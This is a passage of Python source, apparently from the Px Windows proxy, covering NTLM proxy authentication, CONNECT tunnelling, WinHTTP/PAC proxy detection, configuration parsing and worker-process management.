State.proxy_type_lock.release()
def do_transaction(self):
dprint("Entering")
ipport = self.get_destination()
if ipport not in [False, True]:
dprint("Skipping NTLM proxying")
resp = self.do_socket(destination=ipport)
elif ipport:
# Get proxy type directly from do_proxy_type instead by accessing State.proxy_type do avoid
# a race condition with clearing State.proxy_type in load_proxy which sometimes led to a proxy type
# of None (clearing State.proxy_type in one thread was done after another thread's do_proxy_type but
# before accessing State.proxy_type in the second thread)
resp, proxy_type = self.do_proxy_type()
if resp.code == 407:
# Unknown auth mechanism
if proxy_type is None:
dprint("Unknown auth mechanism expected")
return resp
# Generate auth message
ntlm = NtlmMessageGenerator(proxy_type, self.proxy_address[0])
ntlm_resp = ntlm.get_response()
if ntlm_resp is None:
dprint("Bad NTLM response")
return Response(503)
self.fwd_data(resp, flush=True)
# Send auth message
resp = self.do_socket({
"Proxy-Authorization": "%s %s" % (proxy_type, ntlm_resp)
})
if resp.code == 407:
dprint("Auth required")
ntlm_challenge = ""
for header in resp.headers:
if header[0] == "Proxy-Authenticate" and proxy_type in header[1].upper():
h = header[1].split()
if len(h) == 2:
ntlm_challenge = h[1]
break
if ntlm_challenge:
dprint("Challenged")
ntlm_resp = ntlm.get_response(ntlm_challenge)
if ntlm_resp is None:
dprint("Bad NTLM response")
return Response(503)
self.fwd_data(resp, flush=True)
# Reply to challenge
resp = self.do_socket({
"Proxy-Authorization": "%s %s" % (proxy_type, ntlm_resp)
})
else:
dprint("Didn't get challenge, auth didn't work")
else:
dprint("No auth required cached")
else:
dprint("No auth required")
else:
dprint("No proxy server specified and not in noproxy list")
return Response(501)
return resp
def do_HEAD(self):
dprint("Entering")
self.do_GET()
dprint("Done")
def do_PAC(self):
resp = Response(404)
if State.proxy_mode == MODE_PAC and "file://" in State.pac:
pac = file_url_to_local_path(State.pac)
dprint(pac)
try:
resp.code = 200
with open(pac) as p:
resp.data = p.read().encode("utf-8")
resp.body = True
resp.headers = [
("Content-Length", len(resp.data)),
("Content-Type", "application/x-ns-proxy-autoconfig")
]
except:
traceback.print_exc(file=sys.stdout)
return resp
def do_GET(self):
dprint("Entering")
dprint("Path = " + self.path)
if "/PxPACFile.pac" in self.path:
resp = self.do_PAC()
else:
resp = self.do_transaction()
if resp.code >= 400:
dprint("Error %d" % resp.code)
self.send_error(resp.code)
else:
self.fwd_resp(resp)
dprint("Done")
def do_POST(self):
dprint("Entering")
self.do_GET()
dprint("Done")
def do_PUT(self):
dprint("Entering")
self.do_GET()
dprint("Done")
def do_DELETE(self):
dprint("Entering")
self.do_GET()
dprint("Done")
def do_PATCH(self):
dprint("Entering")
self.do_GET()
dprint("Done")
def do_CONNECT(self):
dprint("Entering")
cl = 0
cs = 0
resp = self.do_transaction()
if resp.code >= 400:
dprint("Error %d" % resp.code)
self.send_error(resp.code)
else:
# Proxy connection may be already closed due to header (Proxy-)Connection: close
# received from proxy -> forward this to the client
if self.proxy_socket is None:
dprint("Proxy connection closed")
self.send_response(200, "True")
self.send_header("Proxy-Connection", "close")
self.end_headers()
else:
dprint("Tunneling through proxy")
self.send_response(200, "Connection established")
self.send_header("Proxy-Agent", self.version_string())
self.end_headers()
# sockets will be removed from these lists, when they are detected as closed by remote host;
# wlist contains sockets only when data has to be written
rlist = [self.connection, self.proxy_socket]
wlist = []
# data to be written to client connection and proxy socket respectively
cdata = []
sdata = []
idle = State.config.getint("settings", "idle")
max_idle = time.time() + idle
while not State.exit and (rlist or wlist):
(ins, outs, exs) = select.select(rlist, wlist, rlist, idle)
if exs:
break
if ins:
for i in ins:
if i is self.proxy_socket:
out = self.connection
wdata = cdata
source = "proxy"
else:
out = self.proxy_socket
wdata = sdata
source = "client"
data = i.recv(4096)
if data:
cl += len(data)
# Prepare data to send it later in the outs section
wdata.append(data)
if out not in outs:
outs.append(out)
max_idle = time.time() + idle
else:
# No data means connection closed by remote host
dprint("Connection closed by %s" % source)
# Because tunnel is closed on one end there is no need to read from both ends
rlist.clear()
# Do not write anymore to the closed end
if i in wlist:
wlist.remove(i)
if i in outs:
outs.remove(i)
if outs:
for o in outs:
if o is self.proxy_socket:
wdata = sdata
else:
wdata = cdata
data = wdata[0]
# socket.send() may sending only a part of the data (as documentation says).
# To ensure sending all data
bsnt = o.send(data)
if bsnt > 0:
if bsnt < len(data):
# Not all data was sent; store data not sent and ensure select() get's it
# when the socket can be written again
wdata[0] = data[bsnt:]
if o not in wlist:
wlist.append(o)
else:
wdata.pop(0)
if not data and o in wlist:
wlist.remove(o)
cs += bsnt
else:
dprint("No data sent")
max_idle = time.time() + idle
if max_idle < time.time():
# No data in timeout seconds
dprint("Proxy connection timeout")
break
# After serving the proxy tunnel it could not be used for samething else.
# A proxy doesn't really know, when a proxy tunnnel isn't needed any more (there is no content length for data).
# So servings will be ended either after timeout seconds without data transfer or
# when at least one side closes the connection.
# Close both proxy and client connection if still open.
if self.proxy_socket is not None:
dprint("Cleanup proxy connection")
self.proxy_socket.close()
self.proxy_socket = None
self.close_connection = True
dprint("%d bytes read, %d bytes written" % (cl, cs))
dprint("Done")
def fwd_data(self, resp, flush=False):
cl = resp.length
dprint("Reading response data")
if resp.body:
if cl:
dprint("Content length %d" % cl)
while cl > 0:
if cl > 4096:
l = 4096
cl -= l
else:
l = cl
cl = 0
d = self.proxy_fp.read(l)
if not flush:
self.wfile.write(d)
elif resp.chunked:
dprint("Chunked encoding")
while not State.exit:
line = self.proxy_fp.readline(State.max_line)
if not flush:
self.wfile.write(line)
line = line.decode("utf-8").strip()
if not len(line):
dprint("Blank chunk size")
break
else:
try:
csize = int(line, 16) + 2
dprint("Chunk of size %d" % csize)
except ValueError:
dprint("Bad chunk size '%s'" % line)
continue
d = self.proxy_fp.read(csize)
if not flush:
self.wfile.write(d)
if csize == 2:
dprint("No more chunks")
break
if len(d) < csize:
dprint("Chunk size doesn't match data")
break
elif resp.data is not None:
dprint("Sending data string")
if not flush:
self.wfile.write(resp.data)
else:
dprint("Not sure how much")
while not State.exit:
time.sleep(0.1)
d = self.proxy_fp.read(1024)
if not flush:
self.wfile.write(d)
if len(d) < 1024:
break
if resp.close and self.proxy_socket:
dprint("Close proxy connection per header")
self.proxy_socket.close()
self.proxy_socket = None
def fwd_resp(self, resp):
dprint("Entering")
self.send_response(resp.code)
for header in resp.headers:
dprint("Returning %s: %s" % (header[0], header[1]))
self.send_header(header[0], header[1])
self.end_headers()
self.fwd_data(resp)
dprint("Done")
def get_destination(self):
netloc = self.path
path = "/"
if self.command != "CONNECT":
parse = urlparse.urlparse(self.path, allow_fragments=False)
if parse.netloc:
netloc = parse.netloc
if ":" not in netloc:
port = parse.port
if not port:
if parse.scheme == "http":
port = 80
elif parse.scheme == "https":
port = 443
elif parse.scheme == "ftp":
port = 21
netloc = netloc + ":" + str(port)
path = parse.path or "/"
if parse.params:
path = path + ";" + parse.params
if parse.query:
path = path + "?" + parse.query
dprint(netloc)
# Check destination for noproxy first, before doing any expensive stuff
# possibly involving connections
if State.noproxy.size:
addr = []
spl = netloc.split(":", 1)
try:
addr = socket.getaddrinfo(spl[0], int(spl[1]))
except socket.gaierror:
# Couldn't resolve, let parent proxy try, #18
dprint("Couldn't resolve host")
if len(addr) and len(addr[0]) == 5:
ipport = addr[0][4]
dprint("%s => %s + %s" % (self.path, ipport, path))
if ipport[0] in State.noproxy:
dprint("Direct connection from noproxy configuration")
self.path = path
return ipport
# Get proxy mode and servers straight from load_proxy to avoid
# threading issues
(proxy_mode, self.proxy_servers) = load_proxy()
if proxy_mode in [MODE_AUTO, MODE_PAC]:
proxy_str = find_proxy_for_url(
("https://" if "://" not in self.path else "") + self.path)
if proxy_str == "DIRECT":
ipport = netloc.split(":")
ipport[1] = int(ipport[1])
dprint("Direct connection from PAC")
self.path = path
return tuple(ipport)
if proxy_str:
dprint("Proxy from PAC = " + str(proxy_str))
# parse_proxy does not modify State.proxy_server any more,
# it returns the proxy server tuples instead, because proxy_str
# contains only the proxy servers for the URL served by this thread
self.proxy_servers = parse_proxy(proxy_str)
return True if self.proxy_servers else False
###
# Multi-processing and multi-threading
def get_host_ips():
    """Return this host's IPv4 addresses, with loopback first."""
    ips = ["127.0.0.1"]
    for info in socket.getaddrinfo(socket.gethostname(), 80, socket.AF_INET):
        ips.append(info[4][0])
    return ips
class PoolMixIn(socketserver.ThreadingMixIn):
    """Mixin that runs each request on a shared thread pool instead of
    spawning a new thread per connection."""

    def process_request(self, request, client_address):
        """Queue the request on the executor created by the server."""
        self.pool.submit(self.process_request_thread, request, client_address)

    def verify_request(self, request, client_address):
        """Accept the connection only if the client IP is allowed by config
        (allow list, or host-only mode for local addresses)."""
        client_ip = client_address[0]
        dprint("Client address: %s" % client_ip)
        if client_ip in State.allow:
            return True

        if State.hostonly and client_ip in get_host_ips():
            dprint("Host-only IP allowed")
            return True

        dprint("Client not allowed: %s" % client_ip)
        return False
class ThreadedTCPServer(PoolMixIn, socketserver.TCPServer):
    """TCP server whose requests are served from a bounded thread pool."""

    daemon_threads = True
    allow_reuse_address = True

    def __init__(self, server_address, RequestHandlerClass, bind_and_activate=True):
        """Set up the TCP server and create the worker thread pool sized by
        the settings:threads config option."""
        socketserver.TCPServer.__init__(
            self, server_address, RequestHandlerClass, bind_and_activate)

        workers = State.config.getint("settings", "threads")
        try:
            # Workaround bad thread naming code in Python 3.6+, fixed in master
            self.pool = concurrent.futures.ThreadPoolExecutor(
                max_workers=workers, thread_name_prefix="Thread")
        except:
            self.pool = concurrent.futures.ThreadPoolExecutor(max_workers=workers)
def print_banner():
    """Log the listen address, port and process name, detach the console when
    running frozen in background mode, and dump the effective config."""
    listen = State.config.get("proxy", "listen").strip()
    port = State.config.getint("proxy", "port")
    procname = multiprocessing.current_process().name
    pprint("Serving at %s:%d proc %s" % (listen, port, procname))

    if getattr(sys, "frozen", False) != False or "pythonw.exe" in sys.executable:
        if State.config.getint("settings", "foreground") == 0:
            detach_console()

    for section in State.config.sections():
        for option in State.config.options(section):
            dprint(section + ":" + option + " = " + State.config.get(section, option))
def serve_forever(server):
    """Run the server loop until interrupted, then flag global exit and shut
    the server down."""
    # Restore default SIGINT handling so Ctrl-C raises KeyboardInterrupt
    signal.signal(signal.SIGINT, signal.SIG_DFL)
    try:
        server.serve_forever()
    except KeyboardInterrupt:
        dprint("Exiting")
        State.exit = True
        server.shutdown()
def start_worker(pipeout):
    """Worker-process entry point: re-parse config, adopt the parent's shared
    listening socket received over the pipe, and serve."""
    parse_config()
    address = (State.config.get("proxy", "listen").strip(),
               State.config.getint("proxy", "port"))
    httpd = ThreadedTCPServer(address, Proxy, bind_and_activate=False)
    # socket.fromshare is Windows-only; the parent sends socket.share(pid) data
    httpd.socket = socket.fromshare(pipeout.recv())
    print_banner()
    serve_forever(httpd)
def run_pool():
    """Start the main server, then spawn worker processes that share its
    listening socket (Windows socket.share), and serve in this process too."""
    address = (State.config.get("proxy", "listen").strip(),
               State.config.getint("proxy", "port"))
    try:
        httpd = ThreadedTCPServer(address, Proxy)
    except OSError as exc:
        if "attempt was made" in str(exc):
            print("Px failed to start - port in use")
        else:
            pprint(exc)
        return

    mainsock = httpd.socket
    print_banner()

    if hasattr(socket, "fromshare"):
        # Hand the listening socket to workers-1 child processes
        for _ in range(State.config.getint("settings", "workers") - 1):
            (pipeout, pipein) = multiprocessing.Pipe()
            child = multiprocessing.Process(target=start_worker, args=(pipeout,))
            child.daemon = True
            child.start()
            while child.pid is None:
                time.sleep(1)
            pipein.send(mainsock.share(child.pid))

    serve_forever(httpd)
###
# Proxy detection
class WINHTTP_CURRENT_USER_IE_PROXY_CONFIG(ctypes.Structure):
    """ctypes mirror of WinHTTP's WINHTTP_CURRENT_USER_IE_PROXY_CONFIG struct
    (field order is part of the ABI — do not reorder)."""
    _fields_ = [("fAutoDetect", ctypes.wintypes.BOOL), # "Automatically detect settings"
                ("lpszAutoConfigUrl", ctypes.wintypes.LPWSTR), # "Use automatic configuration script, Address"
                ("lpszProxy", ctypes.wintypes.LPWSTR), # "1.2.3.4:5" if "Use the same proxy server for all protocols",
                                                       # else advanced "ftp=1.2.3.4:5;http=1.2.3.4:5;https=1.2.3.4:5;socks=1.2.3.4:5"
                ("lpszProxyBypass", ctypes.wintypes.LPWSTR), # ";"-separated list, "Bypass proxy server for local addresses" adds "<local>"
                ]
class WINHTTP_AUTOPROXY_OPTIONS(ctypes.Structure):
    """ctypes mirror of WinHTTP's WINHTTP_AUTOPROXY_OPTIONS struct, used as
    input to WinHttpGetProxyForUrl (field order is ABI — do not reorder)."""
    _fields_ = [("dwFlags", ctypes.wintypes.DWORD),
                ("dwAutoDetectFlags", ctypes.wintypes.DWORD),
                ("lpszAutoConfigUrl", ctypes.wintypes.LPCWSTR),
                ("lpvReserved", ctypes.c_void_p),
                ("dwReserved", ctypes.wintypes.DWORD),
                ("fAutoLogonIfChallenged", ctypes.wintypes.BOOL), ]
class WINHTTP_PROXY_INFO(ctypes.Structure):
    """ctypes mirror of WinHTTP's WINHTTP_PROXY_INFO struct, filled in by
    WinHttpGetProxyForUrl (field order is ABI — do not reorder)."""
    _fields_ = [("dwAccessType", ctypes.wintypes.DWORD),
                ("lpszProxy", ctypes.wintypes.LPCWSTR),
                ("lpszProxyBypass", ctypes.wintypes.LPCWSTR), ]
# WinHTTP constants used by the proxy-detection code below.

# Parameters for WinHttpOpen, http://msdn.microsoft.com/en-us/library/aa384098(VS.85).aspx
WINHTTP_NO_PROXY_NAME = 0
WINHTTP_NO_PROXY_BYPASS = 0
WINHTTP_FLAG_ASYNC = 0x10000000

# dwFlags values
WINHTTP_AUTOPROXY_AUTO_DETECT = 0x00000001
WINHTTP_AUTOPROXY_CONFIG_URL = 0x00000002

# dwAutoDetectFlags values
WINHTTP_AUTO_DETECT_TYPE_DHCP = 0x00000001
WINHTTP_AUTO_DETECT_TYPE_DNS_A = 0x00000002

# dwAccessType values
WINHTTP_ACCESS_TYPE_DEFAULT_PROXY = 0
WINHTTP_ACCESS_TYPE_NO_PROXY = 1
WINHTTP_ACCESS_TYPE_NAMED_PROXY = 3
WINHTTP_ACCESS_TYPE_AUTOMATIC_PROXY = 4

# Error messages
WINHTTP_ERROR_WINHTTP_UNABLE_TO_DOWNLOAD_SCRIPT = 12167
def winhttp_find_proxy_for_url(url, autodetect=False, pac_url=None, autologon=True):
    """Ask WinHTTP which proxy to use for `url`, either via WPAD autodetection
    (autodetect=True) or via the given PAC URL.

    Returns a comma-separated proxy server string, "DIRECT" for no proxy, or
    "" when detection fails or neither mode was requested.
    """
    # Fix issue #51
    ACCESS_TYPE = WINHTTP_ACCESS_TYPE_AUTOMATIC_PROXY
    if WIN_VERSION < 6.3:
        # Automatic proxy access type requires Windows 8.1+
        ACCESS_TYPE = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY

    # Handles are pointer-sized; default int restype would truncate on 64-bit
    ctypes.windll.winhttp.WinHttpOpen.restype = ctypes.c_void_p
    hInternet = ctypes.windll.winhttp.WinHttpOpen(
        ctypes.wintypes.LPCWSTR("Px"),
        ACCESS_TYPE, WINHTTP_NO_PROXY_NAME,
        WINHTTP_NO_PROXY_BYPASS, WINHTTP_FLAG_ASYNC)
    if not hInternet:
        dprint("WinHttpOpen failed: " + str(ctypes.GetLastError()))
        return ""

    autoproxy_options = WINHTTP_AUTOPROXY_OPTIONS()
    if pac_url:
        autoproxy_options.dwFlags = WINHTTP_AUTOPROXY_CONFIG_URL
        autoproxy_options.dwAutoDetectFlags = 0
        autoproxy_options.lpszAutoConfigUrl = pac_url
    elif autodetect:
        autoproxy_options.dwFlags = WINHTTP_AUTOPROXY_AUTO_DETECT
        autoproxy_options.dwAutoDetectFlags = WINHTTP_AUTO_DETECT_TYPE_DHCP | WINHTTP_AUTO_DETECT_TYPE_DNS_A
        autoproxy_options.lpszAutoConfigUrl = 0
    else:
        # Neither detection mode requested
        return ""
    autoproxy_options.fAutoLogonIfChallenged = autologon

    proxy_info = WINHTTP_PROXY_INFO()

    # Fix issue #43
    ctypes.windll.winhttp.WinHttpGetProxyForUrl.argtypes = [ctypes.c_void_p,
        ctypes.wintypes.LPCWSTR, ctypes.POINTER(WINHTTP_AUTOPROXY_OPTIONS),
        ctypes.POINTER(WINHTTP_PROXY_INFO)]
    ok = ctypes.windll.winhttp.WinHttpGetProxyForUrl(hInternet, ctypes.wintypes.LPCWSTR(url),
            ctypes.byref(autoproxy_options), ctypes.byref(proxy_info))
    if not ok:
        error = ctypes.GetLastError()
        dprint("WinHttpGetProxyForUrl error %s" % error)
        if error == WINHTTP_ERROR_WINHTTP_UNABLE_TO_DOWNLOAD_SCRIPT:
            dprint("Could not download PAC file, trying DIRECT instead")
            return "DIRECT"
        return ""

    if proxy_info.dwAccessType == WINHTTP_ACCESS_TYPE_NAMED_PROXY:
        # Note: proxy_info.lpszProxyBypass makes no sense here!
        if not proxy_info.lpszProxy:
            dprint('WinHttpGetProxyForUrl named proxy without name')
            return ""
        # Normalize separators to commas and drop trailing DIRECT entries
        return proxy_info.lpszProxy.replace(" ", ",").replace(";", ",").replace(",DIRECT", "") # Note: We only see the first!

    if proxy_info.dwAccessType == WINHTTP_ACCESS_TYPE_NO_PROXY:
        return "DIRECT"

    # WinHttpCloseHandle()
    dprint("WinHttpGetProxyForUrl accesstype %s" % (proxy_info.dwAccessType,))
    return ""
def file_url_to_local_path(file_url):
    """Convert a file:// URL into a Windows local path.

    Examples: file://C:/pac.pac -> C:/pac.pac; a drive-less /path is assumed
    to be on C:. Returns None when no local path can be derived.
    """
    parts = urlparse.urlparse(file_url)
    path = urlparse.unquote(parts.path)
    if path.startswith('/') and not path.startswith('//'):
        drive = parts.netloc
        if len(drive) == 2 and drive[1] == ':':
            # urlparse put the drive letter into netloc (file://C:/...)
            return drive + path
        return 'C:' + path
    if len(path) > 2 and path[1] == ':':
        return path
def load_proxy(quiet=False):
    """Refresh the proxy mode and server list from Windows Internet Options,
    honoring the settings:proxyreload refresh interval.

    Returns (proxy_mode, proxy_servers). When proxies are configured directly
    in Px (MODE_CONFIG) the shared State values are returned unchanged.
    """
    # Return if proxies specified in Px config
    if State.proxy_mode == MODE_CONFIG:
        return (State.proxy_mode, State.proxy_server)

    # Do locking to avoid updating globally shared State object by multiple
    # threads simultaneously
    State.proxy_mode_lock.acquire()
    try:
        proxy_mode = State.proxy_mode
        proxy_servers = State.proxy_server
        # Check if need to refresh
        if (State.proxy_refresh is not None and
                time.time() - State.proxy_refresh <
                State.config.getint("settings", "proxyreload")):
            if not quiet:
                dprint("Skip proxy refresh")
            return (proxy_mode, proxy_servers)

        # Start with clean proxy mode and server list
        proxy_mode = MODE_NONE
        proxy_servers = []

        # Get proxy info from Internet Options
        ie_proxy_config = WINHTTP_CURRENT_USER_IE_PROXY_CONFIG()
        ok = ctypes.windll.winhttp.WinHttpGetIEProxyConfigForCurrentUser(ctypes.byref(ie_proxy_config))
        if not ok:
            if not quiet:
                dprint(ctypes.GetLastError())
        else:
            if ie_proxy_config.fAutoDetect:
                # "Automatically detect settings" (WPAD)
                proxy_mode = MODE_AUTO
            elif ie_proxy_config.lpszAutoConfigUrl:
                # "Use automatic configuration script"
                State.pac = ie_proxy_config.lpszAutoConfigUrl
                proxy_mode = MODE_PAC
                if not quiet:
                    dprint("AutoConfigURL = " + State.pac)
            else:
                # Manual proxy
                proxies = []
                proxies_str = ie_proxy_config.lpszProxy or ""
                for proxy_str in proxies_str.lower().replace(' ', ';').split(';'):
                    if '=' in proxy_str:
                        # Per-scheme entry like "http=1.2.3.4:5"; skip ftp
                        scheme, proxy = proxy_str.split('=', 1)
                        if scheme.strip() != "ftp":
                            proxies.append(proxy)
                    elif proxy_str:
                        proxies.append(proxy_str)
                if proxies:
                    proxy_servers = parse_proxy(",".join(proxies))
                    proxy_mode = MODE_MANUAL

                # Proxy exceptions into noproxy
                bypass_str = ie_proxy_config.lpszProxyBypass or "" # FIXME: Handle "<local>"
                bypasses = [h.strip() for h in bypass_str.lower().replace(' ', ';').split(';')]
                for bypass in bypasses:
                    try:
                        # IP glob entries go into the IPSet; anything that
                        # doesn't parse is treated as a hostname
                        ipns = netaddr.IPGlob(bypass)
                        State.noproxy.add(ipns)
                        if not quiet:
                            dprint("Noproxy += " + bypass)
                    except:
                        State.noproxy_hosts.append(bypass)
                        if not quiet:
                            dprint("Noproxy hostname += " + bypass)

        State.proxy_refresh = time.time()
        if not quiet:
            dprint("Proxy mode = " + str(proxy_mode))
        State.proxy_mode = proxy_mode
        State.proxy_server = proxy_servers

        # Clear proxy types on proxy server update
        State.proxy_type = {}
    finally:
        State.proxy_mode_lock.release()

    return (proxy_mode, proxy_servers)
def find_proxy_for_url(url):
    """Resolve the proxy string for `url` via WPAD autodetection or the
    configured PAC file; returns "", "DIRECT", or a proxy list string."""
    proxy_str = ""
    mode = State.proxy_mode
    if mode == MODE_AUTO:
        proxy_str = winhttp_find_proxy_for_url(url, autodetect=True)
    elif mode == MODE_PAC:
        pac = State.pac
        if "file://" in State.pac:
            # Local PAC files are served back through our own endpoint so
            # WinHTTP can fetch them over HTTP
            host = State.config.get("proxy", "listen") or "localhost"
            port = State.config.getint("proxy", "port")
            pac = "http://%s:%d/PxPACFile.pac" % (host, port)
            dprint("PAC URL is local: " + pac)
        proxy_str = winhttp_find_proxy_for_url(url, pac_url=pac)

    # Handle edge case if the result is a list that starts with DIRECT. Assume
    # everything should be direct as the string DIRECT is tested explicitly in
    # get_destination
    if proxy_str.startswith("DIRECT,"):
        proxy_str = "DIRECT"

    dprint("Proxy found: " + proxy_str)
    return proxy_str
###
# Parse settings and command line
def parse_proxy(proxystrs):
    """Parse a comma-separated list of "host[:port]" entries into a list of
    unique (host, port) tuples; the port defaults to 80. Exits on bad input."""
    if not proxystrs:
        return []

    servers = []
    for entry in [chunk.strip() for chunk in proxystrs.split(",")]:
        fields = [part.strip() for part in entry.split(":")]
        if len(fields) == 1:
            # No port given - default to 80
            fields.append(80)
        elif len(fields) == 2:
            try:
                fields[1] = int(fields[1])
            except ValueError:
                pprint("Bad proxy server port: " + fields[1])
                sys.exit()
        else:
            pprint("Bad proxy server definition: " + entry)
            sys.exit()

        server = tuple(fields)
        if server not in servers:
            servers.append(server)

    return servers
def parse_ip_ranges(iprangesconfig):
    """Parse comma-separated IPs, ranges (a-b), globs (1.2.*.*) and CIDRs
    into a netaddr.IPSet. Exits on any unparseable entry."""
    ipranges = netaddr.IPSet([])

    for iprange in (chunk.strip() for chunk in iprangesconfig.split(",")):
        if not iprange:
            continue

        try:
            if "-" in iprange:
                start, end = iprange.split("-", 1)
                ipns = netaddr.IPRange(start, end)
            elif "*" in iprange:
                ipns = netaddr.IPGlob(iprange)
            else:
                ipns = netaddr.IPNetwork(iprange)
            ipranges.add(ipns)
        except:
            pprint("Bad IP definition: %s" % iprangesconfig)
            sys.exit()

    return ipranges
def parse_allow(allow):
    """Config hook: parse the allow list into State.allow."""
    State.allow = parse_ip_ranges(allow)
def parse_noproxy(noproxy):
    """Config hook: parse the noproxy list into State.noproxy."""
    State.noproxy = parse_ip_ranges(noproxy)
def set_useragent(useragent):
    """Config hook: store the User-Agent override in State."""
    State.useragent = useragent
def set_username(username):
    """Config hook: store the auth username; a "domain\\user" value also
    sets State.domain."""
    domain, sep, user = username.partition("\\")
    if sep and "\\" not in user:
        # Exactly one backslash: split into domain and user
        State.username = user
        State.domain = domain
    else:
        State.username = username
def cfg_int_init(section, name, default, override=False):
    """Initialize an integer config option, keeping any existing ini value
    unless override is True; complains on non-integer input."""
    if override:
        value = default
    else:
        try:
            value = State.config.get(section, name).strip()
        except configparser.NoOptionError:
            value = default

    try:
        value = int(value)
    except ValueError:
        pprint("Invalid integer value for " + section + ":" + name)

    State.config.set(section, name, str(value))
def cfg_float_init(section, name, default, override=False):
    """Initialize a float config option, keeping any existing ini value
    unless override is True; complains on non-float input."""
    if override:
        value = default
    else:
        try:
            value = State.config.get(section, name).strip()
        except configparser.NoOptionError:
            value = default

    try:
        value = float(value)
    except ValueError:
        pprint("Invalid float value for " + section + ":" + name)

    State.config.set(section, name, str(value))
def cfg_str_init(section, name, default, proc=None, override=False):
    """Initialize a string config option, keeping any existing ini value
    unless override is True, and run the optional `proc` hook on the result."""
    if override:
        value = default
    else:
        try:
            value = State.config.get(section, name).strip()
        except configparser.NoOptionError:
            value = default

    State.config.set(section, name, value)

    if proc is not None:
        proc(value)
def save():
    """Write the current config to the ini file, echo it to stdout, exit."""
    with open(State.ini, "w") as fp:
        State.config.write(fp)
    pprint("Saved config to " + State.ini + "\n")
    with open(State.ini, "r") as fp:
        sys.stdout.write(fp.read())

    sys.exit()
def parse_config():
    """Build State.config from the ini file and command line, apply dependent
    settings (gateway/hostonly/allow), resolve the proxy mode, and dispatch
    the action flags (--install/--uninstall/--quit/--save). May exit."""
    if "--debug" in sys.argv:
        State.logger = Log(dfile(), "w")

    if getattr(sys, "frozen", False) != False or "pythonw.exe" in sys.executable:
        # GUI-subsystem build: attach to the parent console so output shows
        attach_console()

    if "-h" in sys.argv or "--help" in sys.argv:
        pprint(HELP)
        sys.exit()

    # Load configuration file
    State.config = configparser.ConfigParser()
    State.ini = os.path.join(os.path.dirname(get_script_path()), State.ini)
    for i in range(len(sys.argv)):
        if "=" in sys.argv[i]:
            val = sys.argv[i].split("=")[1]
            if "--config=" in sys.argv[i]:
                State.ini = val
                if not os.path.exists(val) and "--save" not in sys.argv:
                    pprint("Could not find config file: " + val)
                    sys.exit()
    if os.path.exists(State.ini):
        State.config.read(State.ini)

    # [proxy] section
    if "proxy" not in State.config.sections():
        State.config.add_section("proxy")

    cfg_str_init("proxy", "server", "")
    cfg_int_init("proxy", "port", "3128")
    cfg_str_init("proxy", "listen", "127.0.0.1")
    cfg_str_init("proxy", "allow", "*.*.*.*", parse_allow)
    cfg_int_init("proxy", "gateway", "0")
    cfg_int_init("proxy", "hostonly", "0")
    cfg_str_init("proxy", "noproxy", "", parse_noproxy)
    cfg_str_init("proxy", "useragent", "", set_useragent)
    cfg_str_init("proxy", "username", "", set_username)

    # [settings] section
    if "settings" not in State.config.sections():
        State.config.add_section("settings")

    cfg_int_init("settings", "workers", "2")
    cfg_int_init("settings", "threads", "5")
    cfg_int_init("settings", "idle", "30")
    cfg_float_init("settings", "socktimeout", "20.0")
    cfg_int_init("settings", "proxyreload", "60")
    cfg_int_init("settings", "foreground", "0")

    cfg_int_init("settings", "log", "0" if State.logger is None else "1")
    if State.config.get("settings", "log") == "1" and State.logger is None:
        State.logger = Log(dfile(), "w")

    # Command line flags (override ini values)
    for i in range(len(sys.argv)):
        if "=" in sys.argv[i]:
            val = sys.argv[i].split("=")[1]
            if "--proxy=" in sys.argv[i] or "--server=" in sys.argv[i]:
                cfg_str_init("proxy", "server", val, None, True)
            elif "--listen=" in sys.argv[i]:
                cfg_str_init("proxy", "listen", val, None, True)
            elif "--port=" in sys.argv[i]:
                cfg_int_init("proxy", "port", val, True)
            elif "--allow=" in sys.argv[i]:
                cfg_str_init("proxy", "allow", val, parse_allow, True)
            elif "--noproxy=" in sys.argv[i]:
                cfg_str_init("proxy", "noproxy", val, parse_noproxy, True)
            elif "--useragent=" in sys.argv[i]:
                cfg_str_init("proxy", "useragent", val, set_useragent, True)
            elif "--username=" in sys.argv[i]:
                cfg_str_init("proxy", "username", val, set_username, True)
            else:
                for j in ["workers", "threads", "idle", "proxyreload"]:
                    if "--" + j + "=" in sys.argv[i]:
                        cfg_int_init("settings", j, val, True)

                for j in ["socktimeout"]:
                    if "--" + j + "=" in sys.argv[i]:
                        cfg_float_init("settings", j, val, True)

    if "--gateway" in sys.argv:
        cfg_int_init("proxy", "gateway", "1", True)

    if "--hostonly" in sys.argv:
        cfg_int_init("proxy", "hostonly", "1", True)

    if "--foreground" in sys.argv:
        cfg_int_init("settings", "foreground", "1", True)

    ###
    # Dependency propagation

    # If gateway mode
    if State.config.getint("proxy", "gateway") == 1:
        # Listen on all interfaces
        cfg_str_init("proxy", "listen", "", None, True)

    # If hostonly mode
    if State.config.getint("proxy", "hostonly") == 1:
        State.hostonly = True

        # Listen on all interfaces
        cfg_str_init("proxy", "listen", "", None, True)

    # If not gateway mode or gateway with default allow rules
    if (State.config.getint("proxy", "gateway") == 0 or
            (State.config.getint("proxy", "gateway") == 1 and
             State.config.get("proxy", "allow") in ["*.*.*.*", "0.0.0.0/0"])):
        # Purge allow rules
        cfg_str_init("proxy", "allow", "", parse_allow, True)

    State.proxy_server = parse_proxy(State.config.get("proxy", "server"))

    # Action flags: each of these exits the process when done
    if "--install" in sys.argv:
        install()
    elif "--uninstall" in sys.argv:
        uninstall()
    elif "--quit" in sys.argv:
        quit()
    elif "--save" in sys.argv:
        save()

    if State.proxy_server:
        State.proxy_mode = MODE_CONFIG
    else:
        load_proxy(quiet=True)

    if State.proxy_mode == MODE_NONE and not State.config.get("proxy", "noproxy"):
        pprint("No proxy server or noproxy list defined")
        sys.exit()

    socket.setdefaulttimeout(State.config.getfloat("settings", "socktimeout"))
###
# Exit related
def quit(force=False):
    """Stop all other Px processes: send CTRL_C_EVENT first, then recurse with
    force=True to kill stragglers, printing a dot per pass. Exits when no
    matching processes remain.

    NOTE: intentionally shadows the builtin quit(); called from parse_config.
    """
    count = 0
    mypids = [os.getpid(), os.getppid()]
    for pid in sorted(psutil.pids(), reverse=True):
        if pid in mypids:
            continue

        try:
            p = psutil.Process(pid)
            # Another process running the same executable is a Px instance
            if p.exe().lower() == sys.executable.lower():
                count += 1
                if force:
                    p.kill()
                else:
                    p.send_signal(signal.CTRL_C_EVENT)
        except (psutil.AccessDenied, psutil.NoSuchProcess, PermissionError, SystemError):
            pass
        except:
            traceback.print_exc(file=sys.stdout)

    if count != 0:
        if force:
            sys.stdout.write(".")
        else:
